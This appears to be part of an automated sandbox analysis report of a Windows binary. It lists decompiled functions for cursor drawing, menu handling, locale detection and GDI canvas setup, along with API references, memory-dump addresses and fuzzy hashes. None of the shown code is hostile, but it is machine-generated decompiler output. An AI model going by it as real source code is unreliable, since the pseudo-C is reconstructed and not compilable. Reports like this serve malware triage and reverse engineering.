                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: FocusRect$DrawFill
                                                                                • String ID:
                                                                                • API String ID: 3476037706-0
                                                                                • Opcode ID: 023c5798b253df13c47e7574b285c89412524badf52f1e32af48fe517b180565
                                                                                • Instruction ID: 8f207b3e41a278f91515001cd5490541224029e2ee33265223180d2149407fd5
                                                                                • Opcode Fuzzy Hash: 023c5798b253df13c47e7574b285c89412524badf52f1e32af48fe517b180565
                                                                                • Instruction Fuzzy Hash: 79917E74A001458FCB10EF58C4C5AAEB7F5BF08315F2444BAE9849B316E778AD86CB99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 93%
                                                                                			E004335B0(intOrPtr* __eax, signed int __edx) {
                                                                                				intOrPtr _v16;
                                                                                				char _v20;
                                                                                				char _v24;
                                                                                				char _v28;
                                                                                				intOrPtr _t49;
                                                                                				intOrPtr _t50;
                                                                                				intOrPtr _t53;
                                                                                				intOrPtr _t54;
                                                                                				intOrPtr _t55;
                                                                                				intOrPtr _t56;
                                                                                				intOrPtr* _t60;
                                                                                				intOrPtr* _t62;
                                                                                				struct HICON__* _t65;
                                                                                				intOrPtr _t67;
                                                                                				intOrPtr* _t72;
                                                                                				intOrPtr _t74;
                                                                                				intOrPtr* _t75;
                                                                                				intOrPtr _t78;
                                                                                				intOrPtr _t80;
                                                                                				intOrPtr _t82;
                                                                                				intOrPtr _t84;
                                                                                				intOrPtr _t85;
                                                                                				struct HWND__* _t88;
                                                                                				intOrPtr _t89;
                                                                                				intOrPtr _t91;
                                                                                				intOrPtr* _t93;
                                                                                				intOrPtr _t97;
                                                                                				intOrPtr _t100;
                                                                                				intOrPtr _t102;
                                                                                				intOrPtr _t103;
                                                                                				intOrPtr _t104;
                                                                                				intOrPtr _t106;
                                                                                				struct HWND__* _t107;
                                                                                				intOrPtr _t108;
                                                                                				intOrPtr _t110;
                                                                                				intOrPtr _t114;
                                                                                				intOrPtr _t117;
                                                                                				char _t118;
                                                                                				intOrPtr _t119;
                                                                                				void* _t131;
                                                                                				intOrPtr _t135;
                                                                                				intOrPtr _t140;
                                                                                				intOrPtr* _t155;
                                                                                				void* _t158;
                                                                                				void* _t165;
                                                                                				void* _t166;
                                                                                
                                                                                				_t155 = __eax;
                                                                                				if( *0x487ba0 != 0) {
                                                                                					L3:
                                                                                					_t49 =  *0x487b80; // 0x0
                                                                                					_t50 =  *0x487b80; // 0x0
                                                                                					_t117 = E00433490(_t155,  *((intOrPtr*)(_t50 + 0x9b)),  &_v28, _t49);
                                                                                					if( *0x487ba0 == 0) {
                                                                                						_t168 =  *0x487ba4;
                                                                                						if( *0x487ba4 != 0) {
                                                                                							_t106 =  *0x487b94; // 0x0
                                                                                							_t107 = GetDesktopWindow();
                                                                                							_t108 =  *0x487ba4; // 0x0
                                                                                							E0043D6C4(_t108, _t107, _t168, _t106);
                                                                                						}
                                                                                					}
                                                                                					_t53 =  *0x487b80; // 0x0
                                                                                					if( *((char*)(_t53 + 0x9b)) != 0) {
                                                                                						__eflags =  *0x487ba0;
                                                                                						_t6 =  &_v24;
                                                                                						 *_t6 =  *0x487ba0 != 0;
                                                                                						__eflags =  *_t6;
                                                                                						 *0x487ba0 = 2;
                                                                                					} else {
                                                                                						 *0x487ba0 = 1;
                                                                                						_v24 = 0;
                                                                                					}
                                                                                					_t54 =  *0x487b84; // 0x0
                                                                                					if(_t117 ==  *((intOrPtr*)(_t54 + 4))) {
                                                                                						L12:
                                                                                						_t55 =  *0x487b84; // 0x0
                                                                                						 *((intOrPtr*)(_t55 + 0xc)) =  *_t155;
                                                                                						 *((intOrPtr*)(_t55 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
                                                                                						_t56 =  *0x487b84; // 0x0
                                                                                						if( *((intOrPtr*)(_t56 + 4)) != 0) {
                                                                                							_t97 =  *0x487b84; // 0x0
                                                                                							E004351E4( *((intOrPtr*)(_t97 + 4)),  &_v20, _t155);
                                                                                							_t100 =  *0x487b84; // 0x0
                                                                                							 *((intOrPtr*)(_t100 + 0x14)) = _v20;
                                                                                							 *((intOrPtr*)(_t100 + 0x18)) = _v16;
                                                                                						}
                                                                                						_t131 = E004334E0(2);
                                                                                						_t121 =  *_t155;
                                                                                						_t60 =  *0x487b84; // 0x0
                                                                                						_t158 =  *((intOrPtr*)( *_t60 + 4))( *((intOrPtr*)(_t155 + 4)));
                                                                                						if( *0x487ba4 != 0) {
                                                                                							if(_t117 == 0 || ( *(_t117 + 0x51) & 0x00000020) != 0) {
                                                                                								_t82 =  *0x487ba4; // 0x0
                                                                                								E0043D680(_t82, _t158);
                                                                                								_t84 =  *0x487ba4; // 0x0
                                                                                								_t177 =  *((char*)(_t84 + 0x6a));
                                                                                								if( *((char*)(_t84 + 0x6a)) != 0) {
                                                                                									_t121 =  *((intOrPtr*)(_t155 + 4));
                                                                                									_t85 =  *0x487ba4; // 0x0
                                                                                									E0043D7AC(_t85,  *((intOrPtr*)(_t155 + 4)),  *_t155, __eflags);
                                                                                								} else {
                                                                                									_t88 = GetDesktopWindow();
                                                                                									_t121 =  *_t155;
                                                                                									_t89 =  *0x487ba4; // 0x0
                                                                                									E0043D6C4(_t89, _t88, _t177,  *((intOrPtr*)(_t155 + 4)));
                                                                                								}
                                                                                							} else {
                                                                                								_t91 =  *0x487ba4; // 0x0
                                                                                								E0043D820(_t91, _t131, __eflags);
                                                                                								_t93 =  *0x486dac; // 0x487c00
                                                                                								SetCursor(E004536BC( *_t93, _t158));
                                                                                							}
                                                                                						}
                                                                                						_t62 =  *0x486dac; // 0x487c00
                                                                                						_t65 = SetCursor(E004536BC( *_t62, _t158));
                                                                                						if( *0x487ba0 != 2) {
                                                                                							L32:
                                                                                							return _t65;
                                                                                						} else {
                                                                                							_t179 = _t117;
                                                                                							if(_t117 != 0) {
                                                                                								_t118 = E0043351C(_t121);
                                                                                								_t67 =  *0x487b84; // 0x0
                                                                                								 *((intOrPtr*)(_t67 + 0x58)) = _t118;
                                                                                								__eflags = _t118;
                                                                                								if(__eflags != 0) {
                                                                                									E004351E4(_t118,  &_v24, _t155);
                                                                                									_t65 = E004037B0(_t118, __eflags);
                                                                                									_t135 =  *0x487b84; // 0x0
                                                                                									 *(_t135 + 0x54) = _t65;
                                                                                								} else {
                                                                                									_t78 =  *0x487b84; // 0x0
                                                                                									_t65 = E004037B0( *((intOrPtr*)(_t78 + 4)), __eflags);
                                                                                									_t140 =  *0x487b84; // 0x0
                                                                                									 *(_t140 + 0x54) = _t65;
                                                                                								}
                                                                                							} else {
                                                                                								_push( *((intOrPtr*)(_t155 + 4)));
                                                                                								_t80 =  *0x487b84; // 0x0
                                                                                								_t65 = E004037B0( *((intOrPtr*)(_t80 + 0x38)), _t179);
                                                                                							}
                                                                                							if( *0x487b84 == 0) {
                                                                                								goto L32;
                                                                                							} else {
                                                                                								_t119 =  *0x487b84; // 0x0
                                                                                								_t41 = _t119 + 0x5c; // 0x5c
                                                                                								_t42 = _t119 + 0x44; // 0x44
                                                                                								_t65 = E0040845C(_t42, 0x10, _t41);
                                                                                								if(_t65 != 0) {
                                                                                									goto L32;
                                                                                								}
                                                                                								if(_v28 != 0) {
                                                                                									_t75 =  *0x487b84; // 0x0
                                                                                									 *((intOrPtr*)( *_t75 + 0x34))();
                                                                                								}
                                                                                								_t72 =  *0x487b84; // 0x0
                                                                                								 *((intOrPtr*)( *_t72 + 0x30))();
                                                                                								_t74 =  *0x487b84; // 0x0
                                                                                								asm("movsd");
                                                                                								asm("movsd");
                                                                                								asm("movsd");
                                                                                								asm("movsd");
                                                                                								return _t74;
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					_t65 = E004334E0(1);
                                                                                					if( *0x487b84 == 0) {
                                                                                						goto L32;
                                                                                					}
                                                                                					_t102 =  *0x487b84; // 0x0
                                                                                					 *((intOrPtr*)(_t102 + 4)) = _t117;
                                                                                					_t103 =  *0x487b84; // 0x0
                                                                                					 *((intOrPtr*)(_t103 + 8)) = _v28;
                                                                                					_t104 =  *0x487b84; // 0x0
                                                                                					 *((intOrPtr*)(_t104 + 0xc)) =  *_t155;
                                                                                					 *((intOrPtr*)(_t104 + 0x10)) =  *((intOrPtr*)(_t155 + 4));
                                                                                					_t65 = E004334E0(0);
                                                                                					if( *0x487b84 == 0) {
                                                                                						goto L32;
                                                                                					}
                                                                                					goto L12;
                                                                                				}
                                                                                				_t110 =  *0x487b90; // 0x0
                                                                                				asm("cdq");
                                                                                				_t165 = (_t110 -  *__eax ^ __edx) - __edx -  *0x487b9c; // 0x0
                                                                                				if(_t165 >= 0) {
                                                                                					goto L3;
                                                                                				}
                                                                                				_t114 =  *0x487b94; // 0x0
                                                                                				asm("cdq");
                                                                                				_t65 = (_t114 -  *((intOrPtr*)(__eax + 4)) ^ __edx) - __edx;
                                                                                				_t166 = _t65 -  *0x487b9c; // 0x0
                                                                                				if(_t166 < 0) {
                                                                                					goto L32;
                                                                                				}
                                                                                				goto L3;
                                                                                			}

                                                                                0x0043376f
                                                                                0x0043376f
                                                                                0x00433774
                                                                                0x0043377c
                                                                                0x00433789
                                                                                0x00433789
                                                                                0x00433726
                                                                                0x00433791
                                                                                0x0043379e
                                                                                0x004337aa
                                                                                0x0043387d
                                                                                0x0043387d
                                                                                0x004337b0
                                                                                0x004337b0
                                                                                0x004337b2
                                                                                0x004337d3
                                                                                0x004337d5
                                                                                0x004337da
                                                                                0x004337dd
                                                                                0x004337df
                                                                                0x0043380d
                                                                                0x0043381c
                                                                                0x00433821
                                                                                0x00433827
                                                                                0x004337e1
                                                                                0x004337e9
                                                                                0x004337f5
                                                                                0x004337fa
                                                                                0x00433800
                                                                                0x00433800
                                                                                0x004337b4
                                                                                0x004337b7
                                                                                0x004337ba
                                                                                0x004337c7
                                                                                0x004337c7
                                                                                0x00433831
                                                                                0x00000000
                                                                                0x00433833
                                                                                0x00433833
                                                                                0x00433839
                                                                                0x0043383c
                                                                                0x00433844
                                                                                0x0043384b
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00433852
                                                                                0x00433854
                                                                                0x0043385b
                                                                                0x0043385b
                                                                                0x0043385e
                                                                                0x00433865
                                                                                0x00433868
                                                                                0x00433873
                                                                                0x00433874
                                                                                0x00433875
                                                                                0x00433876
                                                                                0x00000000
                                                                                0x00433876
                                                                                0x00433831
                                                                                0x004337aa
                                                                                0x00433676
                                                                                0x00433682
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00433688
                                                                                0x0043368d
                                                                                0x00433690
                                                                                0x00433698
                                                                                0x0043369b
                                                                                0x004336a2
                                                                                0x004336a8
                                                                                0x004336ad
                                                                                0x004336b9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004336b9
                                                                                0x004335c1
                                                                                0x004335c8
                                                                                0x004335cd
                                                                                0x004335d3
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x004335d5
                                                                                0x004335dd
                                                                                0x004335e0
                                                                                0x004335e2
                                                                                0x004335e8
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • GetDesktopWindow.USER32 ref: 00433624
                                                                                • GetDesktopWindow.USER32 ref: 00433749
                                                                                • SetCursor.USER32(00000000), ref: 0043379E
                                                                                  • Part of subcall function 0043D820: 73451770.COMCTL32(00000000,?,00433779), ref: 0043D83C
                                                                                  • Part of subcall function 0043D820: ShowCursor.USER32(000000FF,00000000,?,00433779), ref: 0043D857
                                                                                • SetCursor.USER32(00000000), ref: 00433789
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Cursor$DesktopWindow$73451770Show
                                                                                • String ID:
                                                                                • API String ID: 3513720257-0
                                                                                • Opcode ID: 5190dd761afb9cb6777465d1d1d9b02bff82538c644734909bf12f8524cc6476
                                                                                • Instruction ID: 927c149ca72bb9ae92c7face1fd7a0d2d6f86c9ae587c9d497579464b7a0dd95
                                                                                • Opcode Fuzzy Hash: 5190dd761afb9cb6777465d1d1d9b02bff82538c644734909bf12f8524cc6476
                                                                                • Instruction Fuzzy Hash: 0E91A5746092418FC304EF69D995A1A7BE2BF48369F2488BEE4148B372D738FD45CB49
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 89%
                                                                                			E0044FAC0(void* __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
                                                                                				char _v8;
                                                                                				char _v12;
                                                                                				char _v16;
                                                                                				char _v20;
                                                                                				void* _t41;
                                                                                				void* _t54;
                                                                                				void* _t61;
                                                                                				struct HMENU__* _t64;
                                                                                				struct HMENU__* _t70;
                                                                                				intOrPtr _t77;
                                                                                				void* _t79;
                                                                                				intOrPtr _t81;
                                                                                				intOrPtr _t83;
                                                                                				intOrPtr _t87;
                                                                                				void* _t92;
                                                                                				intOrPtr _t98;
                                                                                				void* _t111;
                                                                                				intOrPtr _t113;
                                                                                				void* _t116;
                                                                                
                                                                                				_t109 = __edi;
                                                                                				_push(__edi);
                                                                                				_v20 = 0;
                                                                                				_t113 = __edx;
                                                                                				_t92 = __eax;
                                                                                				_push(_t116);
                                                                                				_push(0x44fc86);
                                                                                				_push( *[fs:eax]);
                                                                                				 *[fs:eax] = _t116 + 0xfffffff0;
                                                                                				if(__edx == 0) {
                                                                                					L7:
                                                                                					_t39 =  *((intOrPtr*)(_t92 + 0x248));
                                                                                					if( *((intOrPtr*)(_t92 + 0x248)) != 0) {
                                                                                						E00448D84(_t39, 0, _t109, 0);
                                                                                					}
                                                                                					if(( *(_t92 + 0x1c) & 0x00000008) != 0 || _t113 != 0 && ( *(_t113 + 0x1c) & 0x00000008) != 0) {
                                                                                						_t113 = 0;
                                                                                					}
                                                                                					 *((intOrPtr*)(_t92 + 0x248)) = _t113;
                                                                                					if(_t113 != 0) {
                                                                                						E0041B98C(_t113, _t92);
                                                                                					}
                                                                                					if(_t113 == 0 || ( *(_t92 + 0x1c) & 0x00000010) == 0 &&  *((char*)(_t92 + 0x229)) == 3) {
                                                                                						_t41 = E0043C018(_t92);
                                                                                						__eflags = _t41;
                                                                                						if(_t41 != 0) {
                                                                                							SetMenu(E0043BD14(_t92), 0);
                                                                                						}
                                                                                						goto L30;
                                                                                					} else {
                                                                                						if( *((char*)( *((intOrPtr*)(_t92 + 0x248)) + 0x5c)) != 0 ||  *((char*)(_t92 + 0x22f)) == 1) {
                                                                                							if(( *(_t92 + 0x1c) & 0x00000010) == 0) {
                                                                                								__eflags =  *((char*)(_t92 + 0x22f)) - 1;
                                                                                								if( *((char*)(_t92 + 0x22f)) != 1) {
                                                                                									_t54 = E0043C018(_t92);
                                                                                									__eflags = _t54;
                                                                                									if(_t54 != 0) {
                                                                                										SetMenu(E0043BD14(_t92), 0);
                                                                                									}
                                                                                								}
                                                                                								goto L30;
                                                                                							}
                                                                                							goto L21;
                                                                                						} else {
                                                                                							L21:
                                                                                							if(E0043C018(_t92) != 0) {
                                                                                								_t61 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
                                                                                								_t110 = _t61;
                                                                                								_t64 = GetMenu(E0043BD14(_t92));
                                                                                								_t138 = _t61 - _t64;
                                                                                								if(_t61 != _t64) {
                                                                                									_t70 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t92 + 0x248)))) + 0x34))();
                                                                                									SetMenu(E0043BD14(_t92), _t70);
                                                                                								}
                                                                                								E00448D84(_t113, E0043BD14(_t92), _t110, _t138);
                                                                                							}
                                                                                							L30:
                                                                                							if( *((char*)(_t92 + 0x22e)) != 0) {
                                                                                								E00450B80(_t92, 1);
                                                                                							}
                                                                                							E0044F9F8(_t92);
                                                                                							_pop(_t98);
                                                                                							 *[fs:eax] = _t98;
                                                                                							_push(0x44fc8d);
                                                                                							return E00404320( &_v20);
                                                                                						}
                                                                                					}
                                                                                				}
                                                                                				_t77 =  *0x487c00; // 0x2290f1c
                                                                                				_t79 = E00453244(_t77) - 1;
                                                                                				if(_t79 >= 0) {
                                                                                					_v8 = _t79 + 1;
                                                                                					_t111 = 0;
                                                                                					do {
                                                                                						_t81 =  *0x487c00; // 0x2290f1c
                                                                                						if(_t113 ==  *((intOrPtr*)(E00453230(_t81, _t111) + 0x248))) {
                                                                                							_t83 =  *0x487c00; // 0x2290f1c
                                                                                							if(_t92 != E00453230(_t83, _t111)) {
                                                                                								_v16 =  *((intOrPtr*)(_t113 + 8));
                                                                                								_v12 = 0xb;
                                                                                								_t87 =  *0x486acc; // 0x41ce84
                                                                                								E00406520(_t87,  &_v20);
                                                                                								E0040A0EC(_t92, _v20, 1, _t111, _t113, 0,  &_v16);
                                                                                								E00403D80();
                                                                                							}
                                                                                						}
                                                                                						_t111 = _t111 + 1;
                                                                                						_t10 =  &_v8;
                                                                                						 *_t10 = _v8 - 1;
                                                                                					} while ( *_t10 != 0);
                                                                                				}
                                                                                			}






















                                                                                0x0044fb4e
                                                                                0x0044fb4f
                                                                                0x0044fb4f
                                                                                0x0044fb4f
                                                                                0x0044faf9

                                                                                APIs
                                                                                • GetMenu.USER32(00000000), ref: 0044FBE4
                                                                                • SetMenu.USER32(00000000,00000000), ref: 0044FC01
                                                                                • SetMenu.USER32(00000000,00000000), ref: 0044FC36
                                                                                • SetMenu.USER32(00000000,00000000,00000000,0044FC86), ref: 0044FC52
                                                                                  • Part of subcall function 00406520: LoadStringA.USER32 ref: 00406551
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: Menu$LoadString
                                                                                • String ID:
                                                                                • API String ID: 3688185913-0
                                                                                • Opcode ID: 59f43950d7913d04527af4127a480d71e380f0d7e75c0bbe65dfa983d28bef75
                                                                                • Instruction ID: f26370d87fe6636909658d251d97ac89f97443a29d0f9f175af0801ea8a7ce81
                                                                                • Opcode Fuzzy Hash: 59f43950d7913d04527af4127a480d71e380f0d7e75c0bbe65dfa983d28bef75
                                                                                • Instruction Fuzzy Hash: 8751D330A002885AEB60AF7AC8D575A7694AF05308F18557FEC149B397CB3CEC4C8B9D
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 100%
                                                                                			E0040AD70() {
                                                                                				char _v152;
                                                                                				short _v410;
                                                                                				signed short _t14;
                                                                                				signed int _t16;
                                                                                				int _t18;
                                                                                				void* _t20;
                                                                                				void* _t23;
                                                                                				int _t24;
                                                                                				int _t26;
                                                                                				signed int _t30;
                                                                                				signed int _t31;
                                                                                				signed int _t32;
                                                                                				signed int _t37;
                                                                                				int* _t39;
                                                                                				short* _t41;
                                                                                				void* _t49;
                                                                                
                                                                                				 *0x4877f0 = 0x409;
                                                                                				 *0x4877f4 = 9;
                                                                                				 *0x4877f8 = 1;
                                                                                				_t14 = GetThreadLocale();
                                                                                				if(_t14 != 0) {
                                                                                					 *0x4877f0 = _t14;
                                                                                				}
                                                                                				if(_t14 != 0) {
                                                                                					 *0x4877f4 = _t14 & 0x3ff;
                                                                                					 *0x4877f8 = (_t14 & 0x0000ffff) >> 0xa;
                                                                                				}
                                                                                				memcpy(0x46b0c0, 0x40aec4, 8 << 2);
                                                                                				if( *0x46b0ac != 2) {
                                                                                					_t16 = GetSystemMetrics(0x4a);
                                                                                					__eflags = _t16;
                                                                                					 *0x4877fd = _t16 & 0xffffff00 | _t16 != 0x00000000;
                                                                                					_t18 = GetSystemMetrics(0x2a);
                                                                                					__eflags = _t18;
                                                                                					_t31 = _t30 & 0xffffff00 | _t18 != 0x00000000;
                                                                                					 *0x4877fc = _t31;
                                                                                					__eflags = _t31;
                                                                                					if(__eflags != 0) {
                                                                                						return E0040ACF8(__eflags, _t49);
                                                                                					}
                                                                                				} else {
                                                                                					_t20 = E0040AD58();
                                                                                					if(_t20 != 0) {
                                                                                						 *0x4877fd = 0;
                                                                                						 *0x4877fc = 0;
                                                                                						return _t20;
                                                                                					}
                                                                                					E0040ACF8(__eflags, _t49);
                                                                                					_t37 = 0x20;
                                                                                					_t23 = E004030F8(0x46b0c0, 0x20, 0x40aec4);
                                                                                					_t32 = _t30 & 0xffffff00 | __eflags != 0x00000000;
                                                                                					 *0x4877fc = _t32;
                                                                                					__eflags = _t32;
                                                                                					if(_t32 != 0) {
                                                                                						 *0x4877fd = 0;
                                                                                						return _t23;
                                                                                					}
                                                                                					_t24 = 0x80;
                                                                                					_t39 =  &_v152;
                                                                                					do {
                                                                                						 *_t39 = _t24;
                                                                                						_t24 = _t24 + 1;
                                                                                						_t39 =  &(_t39[0]);
                                                                                						__eflags = _t24 - 0x100;
                                                                                					} while (_t24 != 0x100);
                                                                                					_t26 =  *0x4877f0; // 0x409
                                                                                					GetStringTypeA(_t26, 2,  &_v152, 0x80,  &_v410);
                                                                                					_t18 = 0x80;
                                                                                					_t41 =  &_v410;
                                                                                					while(1) {
                                                                                						__eflags =  *_t41 - 2;
                                                                                						_t37 = _t37 & 0xffffff00 |  *_t41 == 0x00000002;
                                                                                						 *0x4877fd = _t37;
                                                                                						__eflags = _t37;
                                                                                						if(_t37 != 0) {
                                                                                							goto L17;
                                                                                						}
                                                                                						_t41 = _t41 + 2;
                                                                                						_t18 = _t18 - 1;
                                                                                						__eflags = _t18;
                                                                                						if(_t18 != 0) {
                                                                                							continue;
                                                                                						} else {
                                                                                							return _t18;
                                                                                						}
                                                                                						L18:
                                                                                					}
                                                                                				}
                                                                                				L17:
                                                                                				return _t18;
                                                                                				goto L18;
                                                                                			}



















                                                                                APIs
                                                                                • GetStringTypeA.KERNEL32(00000409,00000002,?,00000080,?), ref: 0040AE64
                                                                                • GetThreadLocale.KERNEL32 ref: 0040AD9A
                                                                                  • Part of subcall function 0040ACF8: GetCPInfo.KERNEL32(00000000,?), ref: 0040AD11
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665638902.0000000000486000.00000008.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665652686.0000000000487000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665661703.000000000048D000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665671281.0000000000495000.00000002.00020000.sdmp
                                                                                Similarity
                                                                                • API ID: InfoLocaleStringThreadType
                                                                                • String ID:
                                                                                • API String ID: 1505017576-0
                                                                                • Opcode ID: 0e1c3126f2dfff17c11bd57b361e3b5cd354b25a85c6cacead5f27272a7d8c4f
                                                                                • Instruction ID: 7b20ac4ac1a8ba6006ade8caa557296e2a43b71a996097c4bdc0da4cb0750b93
                                                                                • Opcode Fuzzy Hash: 0e1c3126f2dfff17c11bd57b361e3b5cd354b25a85c6cacead5f27272a7d8c4f
                                                                                • Instruction Fuzzy Hash: 9D3154315883468AE7109725ED25B9B3794EB01300F6484BFEC54AB3C1DB3C9855C7AF
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                C-Code - Quality: 64%
                                                                                			E00422DCC(intOrPtr __eax, void* __edx) {
                                                                                				intOrPtr _v8;
                                                                                				void* __ebx;
                                                                                				void* __ecx;
                                                                                				void* __esi;
                                                                                				void* __ebp;
                                                                                				intOrPtr _t33;
                                                                                				struct HDC__* _t47;
                                                                                				intOrPtr _t54;
                                                                                				intOrPtr _t58;
                                                                                				struct HDC__* _t66;
                                                                                				void* _t67;
                                                                                				intOrPtr _t76;
                                                                                				void* _t81;
                                                                                				intOrPtr _t82;
                                                                                				intOrPtr _t84;
                                                                                				intOrPtr _t86;
                                                                                
                                                                                				_t84 = _t86;
                                                                                				_push(_t67);
                                                                                				_v8 = __eax;
                                                                                				_t33 = _v8;
                                                                                				if( *((intOrPtr*)(_t33 + 0x58)) == 0) {
                                                                                					return _t33;
                                                                                				} else {
                                                                                					E0041FA80(_v8);
                                                                                					_push(_t84);
                                                                                					_push(0x422eab);
                                                                                					_push( *[fs:eax]);
                                                                                					 *[fs:eax] = _t86;
                                                                                					E004240E8( *((intOrPtr*)(_v8 + 0x58)));
                                                                                					E00422C48( *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8));
                                                                                					_t47 = E004242C8( *((intOrPtr*)(_v8 + 0x58)));
                                                                                					_push(0);
                                                                                					L00406A58();
                                                                                					_t66 = _t47;
                                                                                					_t81 =  *( *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28)) + 8);
                                                                                					if(_t81 == 0) {
                                                                                						 *((intOrPtr*)(_v8 + 0x5c)) = 0;
                                                                                					} else {
                                                                                						 *((intOrPtr*)(_v8 + 0x5c)) = SelectObject(_t66, _t81);
                                                                                					}
                                                                                					_t54 =  *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x58)) + 0x28));
                                                                                					_t82 =  *((intOrPtr*)(_t54 + 0x10));
                                                                                					if(_t82 == 0) {
                                                                                						 *((intOrPtr*)(_v8 + 0x60)) = 0;
                                                                                					} else {
                                                                                						_push(0xffffffff);
                                                                                						_push(_t82);
                                                                                						_push(_t66);
                                                                                						L00406BD0();
                                                                                						 *((intOrPtr*)(_v8 + 0x60)) = _t54;
                                                                                						_push(_t66);
                                                                                						L00406BA0();
                                                                                					}
                                                                                					E0041FE44(_v8, _t66);
                                                                                					_t58 =  *0x46b788; // 0x2290b74
                                                                                					E0041428C(_t58, _t66, _t67, _v8, _t82);
                                                                                					_pop(_t76);
                                                                                					 *[fs:eax] = _t76;
                                                                                					_push(0x422eb2);
                                                                                					return E0041FC98(_v8);
                                                                                				}
                                                                                			}

                                                                                APIs
                                                                                  • Part of subcall function 0041FA80: RtlEnterCriticalSection.KERNEL32(00487A5C,00000000,0041E21E,00000000,0041E27D), ref: 0041FA88
                                                                                  • Part of subcall function 0041FA80: RtlLeaveCriticalSection.KERNEL32(00487A5C,00487A5C,00000000,0041E21E,00000000,0041E27D), ref: 0041FA95
                                                                                  • Part of subcall function 0041FA80: RtlEnterCriticalSection.KERNEL32(00000038,00487A5C,00487A5C,00000000,0041E21E,00000000,0041E27D), ref: 0041FA9E
                                                                                  • Part of subcall function 004242C8: 72E7AC50.USER32(00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 0042431E
                                                                                  • Part of subcall function 004242C8: 72E7AD70.GDI32(00000000,0000000C,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 00424333
                                                                                  • Part of subcall function 004242C8: 72E7AD70.GDI32(00000000,0000000E,00000000,0000000C,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 0042433D
                                                                                  • Part of subcall function 004242C8: CreateHalftonePalette.GDI32(00000000,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 00424361
                                                                                  • Part of subcall function 004242C8: 72E7B380.USER32(00000000,00000000,00000000,?,?,?,?,00422E1F,00000000,00422EAB), ref: 0042436C
                                                                                • 72E7A590.GDI32(00000000,00000000,00422EAB), ref: 00422E21
                                                                                • SelectObject.GDI32(00000000,?), ref: 00422E3A
                                                                                • 72E7B410.GDI32(00000000,?,000000FF,00000000,00000000,00422EAB), ref: 00422E63
                                                                                • 72E7B150.GDI32(00000000,00000000,?,000000FF,00000000,00000000,00422EAB), ref: 00422E6F
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.665420356.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000000.00000002.665403863.0000000000400000.00000002.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665626264.000000000046B000.00000004.00020000.sdmp
                                                                                • Associated: 00000000.00000002.665630998.000000000046C000.00000008.00020000.sdmp
